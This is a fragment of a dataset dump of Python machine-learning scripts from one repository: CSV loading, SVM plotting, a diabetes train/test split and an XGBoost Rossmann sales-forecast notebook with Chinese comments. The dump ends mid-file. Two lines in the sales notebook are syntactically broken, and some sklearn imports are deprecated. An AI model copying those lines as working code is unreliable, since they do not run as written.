"text": "from random import seed\nfrom random import randrange\nfrom csv import reader\nimport numpy as np\n\n\n# Load a CSV file\ndef load_csv(filename):\n unknown = '?'\n dataset = list()\n with open(filename, 'r') as file:\n csv_reader = reader(file)\n for index, row in enumerate(csv_reader):\n if unknown in list(row) or index == 0:\n continue\n dataset.append(row)\n return dataset\n\n\n# Convert string column to float\ndef str_column_to_float(dataset, column):\n for row in dataset:\n row[column] = float(row[column].strip())\n\n# Convert third column\ndef int_column_to_float(dataset, column):\n for row in dataset:\n row[column] = float(row[column])\n\ndef int_column_to_floatone(dataset, column):\n for row in dataset:\n row[column] = float(row[column]/10000)\n\ndef int_column_to_floattwo(dataset, column):\n for row in dataset:\n row[column] = float(row[column]/1000)\n\n# Convert string column to integer\ndef str_column_to_index(dataset, column):\n class_values = [row[column] for row in dataset]\n unique = set(class_values)\n lookup = dict()\n for i, value in enumerate(unique):\n lookup[value] = i\n for row in dataset:\n row[column] = lookup[row[column]]\n return lookup\n\n# Split a dataset into k folds\ndef cross_validation_split(dataset, n_folds):\n dataset_split = list()\n dataset_copy = list(dataset)\n fold_size = int(len(dataset) / n_folds)\n for i in range(n_folds):\n fold = list()\n while len(fold) < fold_size:\n index = randrange(len(dataset_copy))\n fold.append(dataset_copy.pop(index))\n dataset_split.append(fold)\n return dataset_split\n\n\n# Calculate accuracy percentage\ndef accuracy_metric(actual, predicted):\n correct = 0\n for i in range(len(actual)):\n if actual[i] == predicted[i]:\n correct += 1\n return correct / float(len(actual)) * 100.0\n\n\n# Evaluate an algorithm using a cross validation split\ndef evaluate_algorithm(dataset, algorithm, n_folds, *args):\n folds = cross_validation_split(dataset, n_folds)\n scores = list()\n for fold in folds:\n train_set = list(folds)\n train_set.remove(fold)\n train_set = sum(train_set, [])\n test_set = list()\n for row in fold:\n row_copy = list(row)\n test_set.append(row_copy)\n row_copy[-1] = None\n predicted = algorithm(train_set, test_set, *args)\n actual = [row[-1] for row in fold]\n accuracy = accuracy_metric(actual, predicted)\n scores.append(accuracy)\n return scores\n\n\n\nseed(1)\n# load and prepare data\nfilename = 'adult.csv'\ndataset = load_csv(filename)\nmatrix = [0,2,4,10,11,12]\nfor i in range(len(dataset[0])):\n if i in matrix:\n str_column_to_float(dataset, i)\n else:\n str_column_to_index(dataset, i)\n int_column_to_float(dataset, i)\nint_column_to_floatone(dataset, 2)\nint_column_to_floattwo(dataset, 11)\nint_column_to_floattwo(dataset, 10)\nm = np.array(dataset)\ndataMat = m[:,0:len(m[0])-1]\nlabelMat = m[:,len(m[0])-1]\n\nprint(labelMat)\n"
},
{
"alpha_fraction": 0.5375657677650452,
"alphanum_fraction": 0.5608565211296082,
"avg_line_length": 28.25274658203125,
"blob_id": "4c83913795c7ec1847cf67b37e9901bf729eb101",
"content_id": "1786b1fd149ae34ffc2da719312a1d1c54e2be4e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2688,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 91,
"path": "/perceptron/testplottttt.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm, datasets\n\ndef loadDataSet(filename):\n a=np.load(filename)\n dataset=[]\n labels=[]\n for i in a:\n x,y=i[5],i[7]\n dataset.append([x,y])\n labels.append(i[14])\n return np.array(dataset), np.array(labels)\n\ndef make_meshgrid(x, y, h=.02):\n x_min, x_max = 0,1\n y_min, y_max = 0,1\n xx, yy = np.meshgrid(np.arange(x_min, x_max, h),\n np.arange(y_min, y_max, h))\n return xx, yy\n\n\ndef plot_contours(ax, clf, xx, yy, **params):\n\n Z = clf.predict(np.c_[xx.ravel(), yy.ravel()])\n Z = Z.reshape(xx.shape)\n out = ax.contourf(xx, yy, Z, **params)\n return out\n\ndef main():\n data = 'nomalized_samples.npy'\n feature, lable = loadDataSet(data)\n dataArr_test = feature[:3000]\n labelArr_test = lable[:3000]\n x1_samples = []\n x2_samples = []\n\n for i in range(3000):\n q = dataArr_test[i]\n\n if labelArr_test[i] == 1:\n x1_samples.append(q)\n else:\n x2_samples.append(q)\n x1 = np.array(x1_samples)\n x2 = np.array(x2_samples)\n # import some data to play with\n\n # Take the first two features. We could avoid this by using a two-dim dataset\n X = np.concatenate((x1, x2), axis=0)\n y = np.array(labelArr_test)\n\n # we create an instance of SVM and fit out data. We do not scale our\n # data since we want to plot the support vectors\n C = 150.0 # SVM regularization parameter\n models = (svm.SVC(kernel='linear', C=C),\n svm.LinearSVC(C=C),\n svm.SVC(kernel='rbf', gamma=0.7, C=C),\n svm.SVC(kernel='poly', degree=3, C=C))\n models = (clf.fit(X, y) for clf in models)\n\n # title for the plots\n titles = ('SVC with linear kernel',\n 'LinearSVC (linear kernel)',\n 'SVC with RBF kernel',\n 'SVC with polynomial (degree 3) kernel')\n\n # Set-up 2x2 grid for plotting.\n fig, sub = plt.subplots(2, 2)\n plt.subplots_adjust(wspace=0.4, hspace=0.4)\n\n X0, X1 = X[:, 0], X[:, 1]\n xx, yy = make_meshgrid(X0, X1)\n\n for clf, title, ax in zip(models, titles, sub.flatten()):\n # 画出预测结果\n plot_contours(ax, clf, xx, yy,\n cmap=plt.cm.coolwarm, alpha=0.8)\n # 把原始点画上去\n ax.scatter(X0, X1, c=y, cmap=plt.cm.coolwarm, s=20, edgecolors='k')\n ax.set_xlim(xx.min(), xx.max())\n ax.set_ylim(yy.min(), yy.max())\n ax.set_xlabel('Sepal length')\n ax.set_ylabel('Sepal width')\n ax.set_xticks(())\n ax.set_yticks(())\n ax.set_title(title)\n plt.show()\n\nif __name__=='__main__':\n main()\n"
},
{
"alpha_fraction": 0.7538071274757385,
"alphanum_fraction": 0.7631133794784546,
"avg_line_length": 44.5,
"blob_id": "379f48b0210736c04877ed4f8b9500982bbf3f6b",
"content_id": "99eb2b9b0103ccf5f649f1d08020e27911756340",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1182,
"license_type": "no_license",
"max_line_length": 95,
"num_lines": 26,
"path": "/KNN.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "from sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.cross_validation import train_test_split, cross_val_score\nfrom sklearn.grid_search import GridSearchCV\nfrom sklearn.metrics import accuracy_score, roc_auc_score, roc_curve\nfrom sklearn.preprocessing import binarize\nimport pandas as pd\nimport matplotlib.pyplot as plt\n%matplotlib inline\n# features info : https://goo.gl/p8ocBn\ncol_names = ['pregnant', 'glucose', 'bp', 'skin', 'insulin', 'bmi', 'pedigree', 'age', 'label']\n# initialization of the Dataset\ndata = pd.read_csv('pima-indians-diabetes.data', names=col_names)\n# checking if there is not empty fields (SKL require none empty field)\ndata.count()\ndata.head()\n# selection of relevant features\nlabel = data['label']\ndata.drop('label', axis=1, inplace=True)\n\nX, y = data, label\n# distributing our Dataset into a training and testing distribution\n# we use the default SKL split (0.75 (75%) for training)\n# random_state=0 Setting the random seed (for reproductibility purpose)\nX_train, X_test, y_train, y_test = train_test_split(X, y, random_state=0)\n# counting the split of Positive (1) and Negative (0) labels in our testing distribution\ny_test.value_counts()"
},
{
"alpha_fraction": 0.6120689511299133,
"alphanum_fraction": 0.6501668691635132,
"avg_line_length": 24.820466995239258,
"blob_id": "06b140b9fa90ed3b18875b2450462040d3fb4f52",
"content_id": "74e0327ed3add946ec7ad74829f79005a4e9797a",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 17856,
"license_type": "no_license",
"max_line_length": 330,
"num_lines": 557,
"path": "/Salesforecast/Salesforecast.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "\n# coding: utf-8\n\n# 开发环境:windows10, Anacoda3.5 , jupyter notebook ,python3.6 \n# 库: numpy,pandas,matplotlib,seaborn,xgboost,time\n# 运行时间:CPU: i7-6700HQ,约8h\n\n# 项目名称: Rossmann 销售预测\n\n# 1.数据分析\n\n# In[1]:\n\n\n# 导入所需要的库\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport matplotlib.pyplot as plt\nget_ipython().run_line_magic('matplotlib', 'inline')\nimport xgboost as xgb\nfrom time import time\n\n\n# In[2]:\n\n\n# 读取数据\ntrain = pd.read_csv('train.csv' ,parse_dates=[2])\ntest = pd.read_csv('test.csv' ,parse_dates=[3])\nstore = pd.read_csv('store.csv')\n\n\n# In[3]:\n\n\n# 查看训练集\ntrain.head().append(train.tail())\n\n\n# In[4]:\n\n\n# 查看测试集\ntest.head().append(test.tail())\n\n\n# In[5]:\n\n\n# 查看店铺信息\nstore.head().append(store.tail())\n\n\n# In[6]:\n\n\n# 查看数据缺失\ndisplay(train.isnull().sum() ,test.isnull().sum() ,store.isnull().sum())\n\n\n# In[7]:\n\n\n# 缺失数据分析\n# 测试集缺失数据\ntest[pd.isnull(test.Open)]\n\n\n# - 缺失数据都来自于622店铺,从周1到周6而且没有假期,所以我们认为这个店铺的状态应该是正常营业的\n\n# In[8]:\n\n\n# 店铺集缺失数据\nstore[pd.isnull(store.CompetitionDistance)]\n\n\n# In[9]:\n\n\nstore[pd.isnull(store.CompetitionOpenSinceMonth)].head(10)\n\n\n# In[10]:\n\n\n# 查看是否Promo2系列的缺失是否是因为没有参加促销\nNoPW = store[pd.isnull(store.Promo2SinceWeek)]\nNoPW[NoPW.Promo2 != 0].shape\n\n\n# - 店铺竞争数据缺失的原因不明,且数量比较多,我们可以用中值或者0来填充,后续的实验发现以0填充的效果更好\n# - 店铺促销信息的缺失是因为没有参加促销活动,所以我们以0填充\n\n# In[11]:\n\n\n# 分析店铺销量随时间的变化\nstrain = train[train.Sale s >0]\nstrain.loc[strain['Store' ]= =1 ,['Date', 'Sales']].plot(x='Date', y='Sales', title='Store1', figsize=(16, 4))\n\n# In[12]:\n\n\n# 分析店铺6-9月份的销量变化\nstrain = train[train.Sales > 0]\nstrain.loc[strain['Store'] == 1, ['Date', 'Sales']].plot(x='Date', y='Sales', title='Store1', figsize=(8, 2),\n xlim=['2014-6-1', '2014-7-31'])\nstrain.loc[strain['Store'] == 1, ['Date', 'Sales']].plot(x='Date', y='Sales', title='Store1', figsize=(8, 2),\n xlim=['2014-8-1', '2014-9-30'])\n\n# - 从上图的分析中,我们可以看到店铺的销售额是有周期性变化的,一年之中11,12月份销量要高于其他月份,可能有季节因素或者促销等原因.\n# - 此外从对2014年6月-9月份的销量来看,6,7月份的销售趋势与8,9月份类似,因为我们需要预测的6周在2015年8,9月份,因此我们可以把2015年6,7月份最近的6周数据作为hold-out数据集,用于模型的优化和验证。\n\n# 2.数据预处理\n\n# In[13]:\n\n\n# 缺失值处理\n# 我们将test中的open数据补为1,即营业状态\ntest.fillna(1, inplace=True)\n# store['CompetitionDistance'].fillna(store['CompetitionDistance'].median(), inplace = True)\n# store['CompetitionOpenScinceYear'].fillna(store['CompetitionDistance'].median(), inplace = True)\n# store['CompetitionOPenScinceMonth'].fillna(store['CompetitionDistance'].median(), inplace = True)\n\n# store中的缺失数据大多与竞争对手和促销有关,在实验中我们发现竞争对手信息的中值填充效果并不好,所以这里统一采用0填充\nstore.fillna(0, inplace=True)\n\n# In[14]:\n\n\n# 查看是否还存在缺失值\ndisplay(train.isnull().sum(), test.isnull().sum(), store.isnull().sum())\n\n# In[15]:\n\n\n# 合并store信息\ntrain = pd.merge(train, store, on='Store')\ntest = pd.merge(test, store, on='Store')\n\n# In[16]:\n\n\n# 留出最近的6周数据作为hold_out数据集进行测试\ntrain = train.sort_values(['Date'], ascending=False)\nho_test = train[:6 * 7 * 1115]\nho_train = train[6 * 7 * 1115:]\n\n# In[17]:\n\n\n# 因为销售额为0的记录不计入评分,所以只采用店铺为开,且销售额大于0的数据进行训练\nho_test = ho_test[ho_test[\"Open\"] != 0]\nho_test = ho_test[ho_test[\"Sales\"] > 0]\nho_train = ho_train[ho_train[\"Open\"] != 0]\nho_train = ho_train[ho_train[\"Sales\"] > 0]\n\n\n# 3.特征工程\n\n# In[18]:\n\n\n# 特征处理与转化,定义特征处理函数\ndef features_create(data):\n # 将存在其他字符表示分类的特征转化为数字\n mappings = {'0': 0, 'a': 1, 'b': 2, 'c': 3, 'd': 4}\n data.StoreType.replace(mappings, inplace=True)\n data.Assortment.replace(mappings, inplace=True)\n data.StateHoliday.replace(mappings, inplace=True)\n\n # 将时间特征进行拆分和转化,并加入'WeekOfYear'特征\n data['Year'] = data.Date.dt.year\n data['Month'] = data.Date.dt.month\n data['Day'] = data.Date.dt.day\n data['DayOfWeek'] = data.Date.dt.dayofweek\n data['WeekOfYear'] = data.Date.dt.weekofyear\n\n # 新增'CompetitionOpen'和'PromoOpen'特征,计算某天某店铺的竞争对手已营业时间和店铺已促销时间,用月为单位表示\n data['CompetitionOpen'] = 12 * (data.Year - data.CompetitionOpenSinceYear) + (\n data.Month - data.CompetitionOpenSinceMonth)\n data['PromoOpen'] = 12 * (data.Year - data.Promo2SinceYear) + (data.WeekOfYear - data.Promo2SinceWeek) / 4.0\n data['CompetitionOpen'] = data.CompetitionOpen.apply(lambda x: x if x > 0 else 0)\n data['PromoOpen'] = data.PromoOpen.apply(lambda x: x if x > 0 else 0)\n\n # 将'PromoInterval'特征转化为'IsPromoMonth'特征,表示某天某店铺是否处于促销月,1表示是,0表示否\n month2str = {1: 'Jan', 2: 'Feb', 3: 'Mar', 4: 'Apr', 5: 'May', 6: 'Jun', 7: 'Jul', 8: 'Aug', 9: 'Sept', 10: 'Oct',\n 11: 'Nov', 12: 'Dec'}\n data['monthStr'] = data.Month.map(month2str)\n data.loc[data.PromoInterval == 0, 'PromoInterval'] = ''\n data['IsPromoMonth'] = 0\n for interval in data.PromoInterval.unique():\n if interval != '':\n for month in interval.split(','):\n data.loc[(data.monthStr == month) & (data.PromoInterval == interval), 'IsPromoMonth'] = 1\n\n return data\n\n\n# In[19]:\n\n\n# 对训练,保留以及测试数据集进行特征转化\nfeatures_create(ho_train)\nfeatures_create(ho_test)\nfeatures_create(test)\nprint('Features creation finished')\n\n# In[20]:\n\n\n# 删掉训练和保留数据集中不需要的特征\nho_train.drop(['Date', 'Customers', 'Open', 'PromoInterval', 'monthStr'], axis=1, inplace=True)\nho_test.drop(['Date', 'Customers', 'Open', 'PromoInterval', 'monthStr'], axis=1, inplace=True)\n\n# In[21]:\n\n\n# 分析训练数据集中特征相关性以及特征与'Sales'标签相关性\nplt.subplots(figsize=(24, 20))\nsns.heatmap(ho_train.corr(), annot=True, vmin=-0.1, vmax=0.1, center=0)\n\n# In[22]:\n\n\n# 拆分特征与标签,并将标签取对数处理\nho_xtrain = ho_train.drop(['Sales'], axis=1)\nho_ytrain = np.log1p(ho_train.Sales)\nho_xtest = ho_test.drop(['Sales'], axis=1)\nho_ytest = np.log1p(ho_test.Sales)\n\n# In[23]:\n\n\n# 删掉测试集中对应的特征与训练集保持一致\nxtest = test.drop(['Id', 'Date', 'Open', 'PromoInterval', 'monthStr'], axis=1)\n\n\n# 4.定义评价函数\n\n# In[24]:\n\n\n# 定义评价函数rmspe\ndef rmspe(y, yhat):\n return np.sqrt(np.mean((yhat / y - 1) ** 2))\n\n\ndef rmspe_xg(yhat, y):\n y = np.expm1(y.get_label())\n yhat = np.expm1(yhat)\n return \"rmspe\", rmspe(y, yhat)\n\n\n# 5.模型构建\n\n# In[25]:\n\n\n# 初始模型构建\n# 参数设定\nparams = {\"objective\": \"reg:linear\",\n \"booster\": \"gbtree\",\n \"eta\": 0.03,\n \"max_depth\": 10,\n \"subsample\": 0.9,\n \"colsample_bytree\": 0.7,\n \"silent\": 1,\n \"seed\": 10\n }\nnum_boost_round = 6000\n\ndtrain = xgb.DMatrix(ho_xtrain, ho_ytrain)\ndvalid = xgb.DMatrix(ho_xtest, ho_ytest)\nwatchlist = [(dtrain, 'train'), (dvalid, 'eval')]\n\n# 模型训练\nprint(\"Train a XGBoost model\")\nstart = time()\ngbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist,\n early_stopping_rounds=100, feval=rmspe_xg, verbose_eval=True)\nend = time()\nprint('Training time is {:2f} s.'.format(end - start))\n\n# 采用保留数据集进行检测\nprint(\"validating\")\nho_xtest.sort_index(inplace=True)\nho_ytest.sort_index(inplace=True)\nyhat = gbm.predict(xgb.DMatrix(ho_xtest))\nerror = rmspe(np.expm1(ho_ytest), np.expm1(yhat))\n\nprint('RMSPE: {:.6f}'.format(error))\n\n# 6.结果分析\n\n# In[26]:\n\n\n# 构建保留数据集预测结果\nres = pd.DataFrame(data=ho_ytest)\nres['Prediction'] = yhat\nres = pd.merge(ho_xtest, res, left_index=True, right_index=True)\nres['Ratio'] = res.Prediction / res.Sales\nres['Error'] = abs(res.Ratio - 1)\nres['Weight'] = res.Sales / res.Prediction\nres.head()\n\n# In[27]:\n\n\n# 分析保留数据集中任意三个店铺的预测结果\ncol_1 = ['Sales', 'Prediction']\ncol_2 = ['Ratio']\nL = np.random.randint(low=1, high=1115, size=3)\nprint('Mean Ratio of predition and real sales data is {}: store all'.format(res.Ratio.mean()))\nfor i in L:\n s1 = pd.DataFrame(res[res['Store'] == i], columns=col_1)\n s2 = pd.DataFrame(res[res['Store'] == i], columns=col_2)\n s1.plot(title='Comparation of predition and real sales data: store {}'.format(i), figsize=(12, 4))\n s2.plot(title='Ratio of predition and real sales data: store {}'.format(i), figsize=(12, 4))\n print('Mean Ratio of predition and real sales data is {}: store {}'.format(s2.Ratio.mean(), i))\n\n# In[28]:\n\n\n# 分析偏差最大的10个预测结果\nres.sort_values(['Error'], ascending=False, inplace=True)\nres[:10]\n\n# - 从分析结果来看,我们的初始模型已经可以比较好的预测hold-out数据集的销售趋势,但是相对真实值,我们的模型的预测值整体要偏高一些。从对偏差数据分析来看,偏差最大的3个数据也是明显偏高。因此我们可以以hold-out数据集为标准对模型进行偏差校正。\n\n# 7.模型优化\n\n# In[29]:\n\n\n# 7.1偏差整体校正优化\nprint(\"weight correction\")\nW = [(0.990 + (i / 1000)) for i in range(20)]\nS = []\nfor w in W:\n error = rmspe(np.expm1(ho_ytest), np.expm1(yhat * w))\n print('RMSPE for {:.3f}:{:.6f}'.format(w, error))\n S.append(error)\nScore = pd.Series(S, index=W)\nScore.plot()\nBS = Score[Score.values == Score.values.min()]\nprint ('Best weight for Score:{}'.format(BS))\n\n# - 当校正系数为0.995时,hold-out集的RMSPE得分最低:0.118889,相对于初始模型 0.125453得分有很大的提升。\n\n# - 因为每个店铺都有自己的特点,而我们设计的模型对不同的店铺偏差并不完全相同,所以我们需要根据不同的店铺进行一个细致的校正。\n\n# In[30]:\n\n\n# 7.2细致校正:以不同的店铺分组进行细致校正,每个店铺分别计算可以取得最佳RMSPE得分的校正系数\nL = range(1115)\nW_ho = []\nW_test = []\nfor i in L:\n s1 = pd.DataFrame(res[res['Store'] == i + 1], columns=col_1)\n s2 = pd.DataFrame(xtest[xtest['Store'] == i + 1])\n W1 = [(0.990 + (i / 1000)) for i in range(20)]\n S = []\n for w in W1:\n error = rmspe(np.expm1(s1.Sales), np.expm1(s1.Prediction * w))\n S.append(error)\n Score = pd.Series(S, index=W1)\n BS = Score[Score.values == Score.values.min()]\n a = np.array(BS.index.values)\n b_ho = a.repeat(len(s1))\n b_test = a.repeat(len(s2))\n W_ho.extend(b_ho.tolist())\n W_test.extend(b_test.tolist())\n\n# In[31]:\n\n\n# 计算校正后整体数据的RMSPE得分\nyhat_new = yhat * W_ho\nerror = rmspe(np.expm1(ho_ytest), np.expm1(yhat_new))\nprint ('RMSPE for weight corretion {:6f}'.format(error))\n\n# - 细致校正后的hold-out集的得分为0.112010,相对于整体校正的0.118889的得分又有不小的提高\n\n# In[32]:\n\n\n# 用初始和校正后的模型对训练数据集进行预测\nprint(\"Make predictions on the test set\")\ndtest = xgb.DMatrix(xtest)\ntest_probs = gbm.predict(dtest)\n\n# 初始模型\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(test_probs)})\nresult.to_csv(\"Rossmann_submission_1.csv\", index=False)\n\n# 整体校正模型\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(test_probs * 0.995)})\nresult.to_csv(\"Rossmann_submission_2.csv\", index=False)\n\n# 细致校正模型\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(test_probs * W_test)})\nresult.to_csv(\"Rossmann_submission_3.csv\", index=False)\n\n# - 然后我们用不同的seed训练10个模型,每个模型单独进行细致偏差校正后进行融合.\n\n# In[33]:\n\n\n# 7.2训练融合模型\nprint(\"Train an new ensemble XGBoost model\")\nstart = time()\nrounds = 10\npreds_ho = np.zeros((len(ho_xtest.index), rounds))\npreds_test = np.zeros((len(test.index), rounds))\nB = []\nfor r in range(rounds):\n print('round {}:'.format(r + 1))\n\n params = {\"objective\": \"reg:linear\",\n \"booster\": \"gbtree\",\n \"eta\": 0.03,\n \"max_depth\": 10,\n \"subsample\": 0.9,\n \"colsample_bytree\": 0.7,\n \"silent\": 1,\n \"seed\": r + 1\n }\n num_boost_round = 6000\n gbm = xgb.train(params, dtrain, num_boost_round, evals=watchlist,\n early_stopping_rounds=100, feval=rmspe_xg, verbose_eval=True)\n\n yhat = gbm.predict(xgb.DMatrix(ho_xtest))\n\n L = range(1115)\n W_ho = []\n W_test = []\n for i in L:\n s1 = pd.DataFrame(res[res['Store'] == i + 1], columns=col_1)\n s2 = pd.DataFrame(xtest[xtest['Store'] == i + 1])\n W1 = [(0.990 + (i / 1000)) for i in range(20)]\n S = []\n for w in W1:\n error = rmspe(np.expm1(s1.Sales), np.expm1(s1.Prediction * w))\n S.append(error)\n Score = pd.Series(S, index=W1)\n BS = Score[Score.values == Score.values.min()]\n a = np.array(BS.index.values)\n b_ho = a.repeat(len(s1))\n b_test = a.repeat(len(s2))\n W_ho.extend(b_ho.tolist())\n W_test.extend(b_test.tolist())\n\n yhat_ho = yhat * W_ho\n yhat_test = gbm.predict(xgb.DMatrix(xtest)) * W_test\n error = rmspe(np.expm1(ho_ytest), np.expm1(yhat_ho))\n B.append(error)\n preds_ho[:, r] = yhat_ho\n preds_test[:, r] = yhat_test\n print('round {} end'.format(r + 1))\n\nend = time()\ntime_elapsed = end - start\nprint('Training is end')\nprint('Training time is {} h.'.format(time_elapsed / 3600))\n\n# In[34]:\n\n\n# 分析不同模型的相关性\npreds = pd.DataFrame(preds_ho)\nsns.pairplot(preds)\n\n# - 模型融合可以采用简单平均或者加权重的方法进行融合。从上图来看,这10个模型相关性很高,差别不大,所以权重融合我们只考虑训练中单独模型在hold-out模型中的得分情况分配权重。\n\n# In[35]:\n\n\n# 模型融合在hold-out数据集上的表现\n\n# 简单平均融合\nprint ('Validating')\n\nbagged_ho_preds1 = preds_ho.mean(axis=1)\nerror1 = rmspe(np.expm1(ho_ytest), np.expm1(bagged_ho_preds1))\nprint('RMSPE for mean: {:.6f}'.format(error1))\n\n# 加权融合\nR = range(10)\nMw = [0.20, 0.20, 0.10, 0.10, 0.10, 0.10, 0.10, 0.10, 0.00, 0.00]\nA = pd.DataFrame()\nA['round'] = R\nA['best_score'] = B\nA.sort_values(['best_score'], inplace=True)\nA['weight'] = Mw\nA.sort_values(['round'], inplace=True)\nweight = np.array(A['weight'])\npreds_ho_w = weight * preds_ho\nbagged_ho_preds2 = preds_ho_w.sum(axis=1)\nerror2 = rmspe(np.expm1(ho_ytest), np.expm1(bagged_ho_preds2))\nprint('RMSPE for weight: {:.6f}'.format(error2))\n\n# - 权重模型较均值模型有比较好的得分\n\n# In[36]:\n\n\n##用均值融合和加权融合后的模型对训练数据集进行预测\n# 均值融合\nprint(\"Make predictions on the test set\")\nbagged_preds = preds_test.mean(axis=1)\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(bagged_preds)})\nresult.to_csv(\"Rossmann_submission_4.csv\", index=False)\n# 加权融合\nbagged_preds = (preds_test * weight).sum(axis=1)\nresult = pd.DataFrame({\"Id\": test['Id'], 'Sales': np.expm1(bagged_preds)})\nresult.to_csv(\"Rossmann_submission_5.csv\", index=False)\n\n# 8.模型特征重要性及最佳模型结果分析\n\n# In[37]:\n\n\n# 模型特征重要性\nxgb.plot_importance(gbm)\n\n# - 从模型特征重要性分析,比较重要的特征有四类包括1.周期性特征'Day','DayOfWeek','WeekOfYera','Month'等,可见店铺的销售额与时间是息息相关的,尤其是周期较短的时间特征;2.店铺差异'Store'和'StoreTyp'特征,不同店铺的销售额存在特异性;3.短期促销(Promo)情况:'PromoOpen'和'Promo'特征,促销时间的长短与营业额相关性比较大;4.竞争对手相关特征包括:'CompetitionOpen',‘CompetitionDistance','CompetitionOpenSinceMoth'以及'CompetitionOpenScinceyear',竞争者的距离与营业年限对销售额有影响。\n# - 作用不大的特征主要两类包括:1.假期特征:'SchoolHoliday'和'StateHoliday',假期对销售额影响不大,有可能是假期店铺大多不营业,对模型预测没有太大帮助。2.持续促销(Promo2)相关的特征:'Promo2','Prom2SinceYear'以及'Prom2SinceWeek'等特征,有可能持续的促销活动对短期的销售额影响有限。\n\n# In[38]:\n\n\n# 采用新的权值融合模型构建保留数据集预测结果\nres1 = pd.DataFrame(data=ho_ytest)\nres1['Prediction'] = bagged_ho_preds2\nres1 = pd.merge(ho_xtest, res1, left_index=True, right_index=True)\nres1['Ratio'] = res1.Prediction / res.Sales\nres1['Error'] = abs(res1.Ratio - 1)\nres1.head()\n\n# In[39]:\n\n\n# 分析偏差最大的10个预测结果与初始模型差异\nres1.sort_values(['Error'], ascending=False, inplace=True)\nres['Store_new'] = res1['Store']\nres['Error_new'] = res1['Error']\nres['Ratio_new'] = res1['Ratio']\ncol_3 = ['Store', 'Ratio', 'Error', 'Store_new', 'Ratio_new', 'Error_new']\ncom = pd.DataFrame(res, columns=col_3)\ncom[:10]\n\n# - 从新旧模型预测结果最大的几个偏差对比的情况来看,最终的融合模型在这几个预测值上大多有所提升,证明模型的校正和融合确实有效。\n\n"
},
{
"alpha_fraction": 0.4589427411556244,
"alphanum_fraction": 0.47701629996299744,
"avg_line_length": 28.996864318847656,
"blob_id": "a5fb5cca313837bbb84f4ef0bd7baa4b7a0606c4",
"content_id": "263b7e9035698ddb7cb4d328ab1f2c1a40ee233d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9668,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 319,
"path": "/perceptron/SVM.py",
"repo_name": "weinanfu/Machine-Learning",
"src_encoding": "UTF-8",
"text": "import csv\nimport math\nimport random\nimport matplotlib.ticker as ticker\n\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn import svm\nfrom sklearn.svm import SVC\nfrom sklearn.metrics import confusion_matrix\nfrom sklearn.metrics import explained_variance_score\n\n\nclass Data_Proccess:\n def __init__(self, mode):\n self.mode = mode\n self.heads = []\n\n def read_data(self, path):\n data = []\n with open(path, newline='') as csvfile:\n reader = csv.reader(csvfile, delimiter=',', quotechar='|')\n for i in reader:\n if '\"?\"' not in i:\n data.append(i)\n return data\n\n def preprocess_data(self, data):\n l, ll = len(data), len(data[0])\n heads = data[0]\n categories = {}\n nomalize = {}\n for i in range(l):\n if i == 1:\n for j in range(ll):\n if self.isnumber(data[i][j]):\n data[i][j] = float(data[i][j])\n nomalize[j] = data[i][j]\n else:\n if j in categories:\n categories[j].add(data[i][j])\n else:\n categories[j] = {data[i][j]}\n if i > 1:\n for j in range(len(data[i])):\n if j in categories:\n if data[i][j] not in categories[j]:\n categories[j].add(data[i][j])\n else:\n data[i][j] = float(data[i][j])\n if j in nomalize:\n nomalize[j] = max(data[i][j], nomalize[j])\n else:\n nomalize[j] = data[i][j]\n self.heads = heads\n return heads, categories, data, nomalize\n\n def isnumber(self, value):\n try:\n float(value)\n return True\n except ValueError:\n return False\n\n def quantize(self, categories, label):\n dic = {}\n for i in categories:\n if i != label:\n l = len(categories[i])\n for j, k in enumerate(categories[i], start=1):\n dic[k] = j / l\n else:\n q = -1\n for j, k in enumerate(categories[i], start=1):\n dic[k] = pow(q, j)\n return dic\n\n def deal_data(self, dic, data, categories):\n l, ll = len(data), len(data[0])\n for i in range(1, l):\n for j in categories:\n data[i][j] = dic[data[i][j]]\n return np.array(data[1:])\n\n def nomalize(self, nomalize, data):\n l, ll = len(data), len(data[0])\n for i in range(l):\n for j in nomalize:\n data[i][j] = data[i][j] / float(nomalize[j])\n\n def cross_validation(self, data, number):\n div = len(data) // number\n np.random.shuffle(data)\n test_data = data[: div]\n training_data = data[div:]\n return test_data, training_data\n\n def find_negative(self, trainset):\n po, ne = [], []\n for i in trainset:\n if i[-1] == 1.0:\n po.append(i)\n else:\n ne.append(i)\n return np.array(po), np.array(ne)\n\n def information_gain(self, col, data):\n categories = {}\n for i in data[1:]:\n q = i[col] // 0.1\n if q in categories:\n if i[-1] in categories[q]:\n categories[q][i[-1]] += 1\n else:\n categories[q][i[-1]] = 1\n else:\n categories[q] = {i[-1]: 1}\n ecol = self.entropy(categories, len(data) - 1)\n return ecol\n #self.plot(col, categories)\n\n def entropy(self, dic, s):\n e = 0\n for i in dic:\n se, su = self.e(dic[i])\n e += se * su / s\n return e\n\n def e(self, dic):\n # dic: -1:x, 1:y\n s = sum(dic.values())\n e = 0\n for i in dic:\n e += self.one_entropy(dic[i], s)\n return e, s\n\n def plot(self, col, cat):\n head = self.heads[col]\n x = list(cat.keys())\n if type(x[0]) is float:\n x.sort()\n po = []\n na = []\n for i in x:\n if '\"<=50K\"' in cat[i]:\n na.append(cat[i]['\"<=50K\"'])\n else:\n na.append(0)\n if '\">50K\"' in cat[i]:\n po.append(cat[i]['\">50K\"'])\n else:\n po.append(0)\n width = 0.5\n fig = 